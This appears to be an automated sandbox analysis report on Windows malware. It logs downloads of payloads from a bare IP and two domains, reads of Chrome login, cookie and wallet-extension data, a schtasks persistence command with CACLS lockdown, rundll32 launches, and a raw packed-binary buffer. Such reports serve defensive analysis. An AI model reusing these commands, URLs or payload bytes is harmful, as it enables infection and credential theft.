registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.r14: 2
registers.r15: 0
registers.rcx: 977200
registers.rsi: 2004499152
registers.r10: 0
registers.rbx: 0
registers.rsp: 979008
registers.r11: 514
registers.r8: 0
registers.r9: 0
registers.rdx: 0
registers.r12: 8791583852698
registers.rbp: 979032
registers.rdi: 8791581822976
registers.rax: 2003871062
registers.r13: 0
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://62.182.156.152/so57Nst/index.php?scr=1
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://62.182.156.152/so57Nst/index.php
suspicious_features GET method with no useragent header suspicious_request GET http://haisatatakarya.com/64.dll
suspicious_features GET method with no useragent header suspicious_request GET http://africatechs.com/YoutubeAdvert.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://62.182.156.152/so57Nst/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://62.182.156.152/so57Nst/Plugins/clip64.dll
suspicious_features GET method with no useragent header suspicious_request GET https://africatechs.com/YoutubeAdvert.exe
request POST http://62.182.156.152/so57Nst/index.php?scr=1
request POST http://62.182.156.152/so57Nst/index.php
request GET http://haisatatakarya.com/64.dll
request GET http://africatechs.com/YoutubeAdvert.exe
request GET http://62.182.156.152/so57Nst/Plugins/cred64.dll
request GET http://62.182.156.152/so57Nst/Plugins/clip64.dll
request GET https://africatechs.com/YoutubeAdvert.exe
request POST http://62.182.156.152/so57Nst/index.php?scr=1
request POST http://62.182.156.152/so57Nst/index.php
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1676
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02d70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1236
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000004b70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7559d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f5000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7559c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7580a000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7559c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x755ab000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f5000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x755ab000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7559d000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f5000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x755a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x755a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x755a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7580c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x755a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x755a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x755a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7559c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75443000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x755a8000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x755a8000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7581c000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x755a8000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f5000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x755a8000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f5000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7559b000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f5000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7586f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x755ff000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75608000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x757f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7559b000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ckpaelocniggkheibcacecnmmlmeodfa
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
name WAV language LANG_PORTUGUESE filetype empty sublanguage SUBLANG_PORTUGUESE offset 0x005cf598 size 0x0001f934
name RT_VERSION language LANG_PORTUGUESE filetype COM executable for DOS sublanguage SUBLANG_PORTUGUESE offset 0x007959a0 size 0x000003b8
file C:\Users\test22\AppData\Local\Temp\1000011051\YoutubeAdvert.exe
file C:\Users\test22\AppData\Roaming\80c6bf70bf3f8f\cred64.dll
file C:\Users\test22\AppData\Roaming\80c6bf70bf3f8f\clip64.dll
file C:\Users\test22\AppData\Local\Temp\1000006061\64.dll
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\9b11736588\oneetx.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\9b11736588" /P "test22:N"&&CACLS "..\9b11736588" /P "test22:R" /E&&Exit
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\9b11736588\oneetx.exe" /F
file C:\Users\test22\AppData\Roaming\80c6bf70bf3f8f\clip64.dll
file C:\Users\test22\AppData\Local\Temp\1000011051\YoutubeAdvert.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\9b11736588\oneetx.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\9b11736588\oneetx.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\9b11736588\oneetx.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\9b11736588" /P "test22:N"&&CACLS "..\9b11736588" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Local\Temp\1000006061\64.dll, rundll
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000011051\YoutubeAdvert.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000011051\YoutubeAdvert.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\80c6bf70bf3f8f\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\80c6bf70bf3f8f\clip64.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@غ´ Í!¸LÍ!This program cannot be run in DOS mode. $¨Œë@ìí…ìí…ìí…Ë+þáí…ìí„Àí…ìí…íí…ƒ›íí…ƒ›íí…Richìí…PEd†—½ dð"  .šˆ€Ð8B9@pE«€ô`É8¼`8È ž- ` U @@@ SP@À °`@@.edatap@@.idata€@À.themida@8@8 `à+—“½+Á½+—½+Ëõú©Á×ÍVj_ˇZ°>É!•ª¿S»†¥ÄDv7ôRÔ{Ť;ñ=l¼¹QÜ-&Å»V˜ÕSÐÌz´¹¡ýïŽÉË§‰ÆÈ7b3½U ë‹…Œ(©×èª!•-üæàÈõi Î~¼f£&R€EsVOµÏª¡OšðSôP¬÷Ê{ïÞ`:òçàÇ`Í(/DäÐPLP㒺°:舯+u„ÍGº äVð½ÿ}Ä€»öÉ.ÄÛ¿{†HåŸÃ¢ I CêÿyŽÖ÷÷Ek9ˀ0ª@ï–±ÞŽ;ãY¾·™e0Õ8Vg„5êð¹C¸xç½÷µ^!唧¦¡]ÈFN_øÙÀœ‹V¸”~GcGdz&2+š9®x7i¿%èdÅìRÏQ`ò ÆOoÇ›s£ íEÎ ei÷duÁ>šƒxŽ?,pøz3S½ëV¼p‚å¤òs%1TJ¢A\ M9ò‹FbÁôSþ“« õ쯓¨HÚ¤ÿ>=Y †ÅùÌÿ“¦qä" ·(ÝoQzqv’£šngñ¨¶–»v|‘ò5Qu4‡ÚDô§©äm­åä<²@;ŠÐ÷¸\»æ yƒ3ÅÛFÏþJe{&·˧È¥#´ÚOu”N.:ݧ¤w´±·cTiLrOV!?’×Æ2—7â$ŒÒ£·}.ˆHœ«^á¥9ôÖ꫼Ññq¬Èª3‰Ç¨·XŠ®›Ïu’2Ó ~Îéñ8\šøÁ~_1ê£Jc¡K~ÖC4o϶Ä?Åe?%Ã$j|è¹ýÚ 4/\í$>ü`¯ý‹Iº[ƒa48ʋÐs³/s¨ß»ºúÀ(ž„y”ŠærÖ÷w>Q/Š©LfpEé…œtqÜAbz#ö}*TýŽ¿o­±ðǝ–¦ÚӀp‹Ü¦Á3 ªÖV¨×ñ5Óĺˆû׊ó]ž ™—m µùѾM¶Po0û¤†Êh׎/}/ÇԋÄ<=âº*JƘê^oCžwç±ó@Ó_Fc'À„óH4QRºn™A­jä Ëց³ž%tæ¸RBî ÒÄ­-T\`#ÅWÔSJ9 {ÚáN/·P^" r—'1ƒœšî„Q!÷·jÃýü Ä<Šœâ5­^!½¬Ãt¡aš,^áa»Á;c¦§"‚йô1‡ 0*¿¶#¸‘•íÇ_ˆŠ9ŒÎ÷ hˆ.B€u×òAÐi2ewaÕ]Ñà÷Löíɵ‚³w{8š î‹ã¥ä[ŸLìb7lÐ ]´€’Ç|>0> ¤’§2“ÿÛû’¢i›yþ¥à‚í9ϬrTÙÐç¦éç¸Qa¥×ºŸO2bÌùxPûÜe•ÏȘ6æf–|E,"ñ [[‰±¤ðVJԅo"C$zLqÁꍙÞ2œ@]‚º ÓVâIJãÎZ)Gxlþ+g+¦¿;T” þ³¾8"ü 8½¼´›¤ÅƒäMºpaN„)n©ÄõE=õ:ãCò֝~€>¯ç ðPÏ6Oá~ iz?EŒx(ÉY*ϋ>”3¥fh?“1U l~™I ¤\8ˆ1‹ºà^ÅüÖ{ó¥?°ŸZQÉXtÍMøÄ ÃJ|óñ¢Ä‘u§€¾I]ᴉý°"µÏéáÁ·s)+Æ6„Ž®¦6‰ïÓéÙYkò‚_²íÈ~ùy]ö™\‡ãKtŸ±A·ÒåópÁ£¦ ?—Ê;ã{äN“W-Ý&¦‡;Q‰ûÛß$æ׎ÙÏ·¬Uߑ)GU ÏÈ9?qžMÙ㾝>ž==g`¡ÑDËÛāX’CùõG.Âê†ñŽ!?6º^§·™{gclZ@¿Ž Éàee <ó4ľ²©ÿü[“Xìº7štVl,P0$\³*Èi,‡Ào£òôh¥}sO¤ Ó¾>Zk›q ØòåWëÊYûø…boKÂ:e¼§Ò.Ò»´2ñÍ'É9Ý C¶Žl¾=첔RÐ({"ï§{ç7žYßsÔZi=tµ€ve{S¸L7<™ÍL_—§cãbùvéA<ïJ±yތÓlÅÃøÞ©íC÷¢c¨€½¶cé7Q»äàj ?›À&pN;cd*'ÞÿxE͒jè yÛ×~š‚õêÀ®ÔïͅÝ÷giŒe†MƯ—Û,(ª® ¾?±âwÀAàhŠp°Þ¢ð"ËgaÙ»°´¢ówHv{¬ÄE'Ÿ&O©ý¶üߏëîLŠsŒ°ÉF„PöAhµ[øÿNÔNíñAXƸ´ óps‚à֙lô;cÂ=mW‚*!fè¾Ã.Š,#ËÕnjt9#„D¢¨ð"lÎ}89ßv‰:™Ê? ¤¡OØ>€­‹”P«áô0šyŒ÷p‡¬˜¥oã~cX#ª<…:½¶rÃȌ¯×TÙÙ% XŒ7$öøžÙú 5kùïù–“¹0~%p_…O5”d"'œÍ\¯tÞmßû\zÊËlôÕó^ CP"x”DlÖÿ>¾ ^¬Ê¾ãD${ôigdÉÞÖãíjšå8‰ß8ð”@HX¦lùöÌØcCËjåYZ“#WÈê»/]›.†ïšº‘’ró$·!Ú¨%ïE ·“pUB§n¹ùÉIâÛÈÿ_ï«öÃ7Aû/Üà¸qÝ¡A5‘&èö¥lK¸œÑ|ïªaªæ‡!–±o‰ÔÎBSloŒpû!—ó <FLÎ{lŸó–A%G••‰WŠs4šlגٸ¼Ûþ£à<T‹šjìK–âF^ª†A<ßõÕú ß/ÙÔÁN¨ª@ßÓÑW‹Ï+‰z©i;÷ ‘øÉTzH Ʉ¯ºN'Ê·ÖPN£sloòÁ¬ÄËß~ãÃ_À‡›ƒjrPå¹c¾ð-ÇOÞ¾ ¢3IVn‘—éüT·}ó¹y6)?"pYԕ«äõ¬œ;°oº2ä‘ë}/^Nyñj<OP7›ö{C vÜâúõ…YS šÿ¸¯íK/Ä0§à¾Z~jžKꓟñäæ"uóu ”ÉGì~Îë®M-)®‡ê1å-Ë9/zëÊg;NSÇތ¢hÀû¾U=£áXÜj*ÂoSIʜË,òEó–L˜¶pß g ß5[ ð"›Í‹y\Ïb‘RcHºßEÓÎÁRÅ˜lâà|Z©diç÷s¯(ãá] r±Afñ/6e3Ȋ=‰ q 6O ނޙҤ¶×nd”Êáš.ÕeT먓kcKǁ ¡ü©y‡Ô‡·–Õ–)?¦¡Ó7¯‹U¨ 2 ]™¯ ´Ù=Fž8<zßþ¯ÉT¡U.e]‹…$ª9®vÃÆp‹>Â'$x-ùß^¿2mϪŸP/DÑkéî`Ym»–e NPÍÐP3ªÃU¦ÛDöÒW–©‹áwÀwñ’]mè…Ó'ðác¯xÝo·¬2ŽKª9žVš.‰°ØÇ[µ'•nvNH«„I˃Ã]„¶7ÐSÁz?2×é} &‹¸A \e^\X8%IÉç«ß}Ëõ}ᡤâÜÚX-P K¿s¦…lÆí¦ÐCŸš[¡4Hì6ë\y-ºÖÖ¢Ñ"4w'ŒÛa=ˆÊ­ýŒL—v+ú,K§  ˆ$·ÖÅLÖlkÿh™ƒŠq„¹¾<û½¾â[\%‡L—é6X¨vÕ]ÑߖŠª5ø™t§Ãa$k6…uéÍI/ä˜÷¼lÛ"’ÜX‹;֘pÁsßߧ]Iœ…T}+ôBkÑY#jCc hZú?Ÿá°äÒ!àPóf@:dÖù =Z±¡¶eñs1å£ g(] ;£H³öž.=­¼O¸Ëq Ô%&DTÔ£ñ‰e zUüMÌ@ž&M xüT{÷˖Û4lægN>Z7p—P)˜€sp>‡”< l- z%Pgk×)bÝÏKþmÁ¥Lš >ó’³)Ðæü1ÂÉ»Êu^·ˆ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

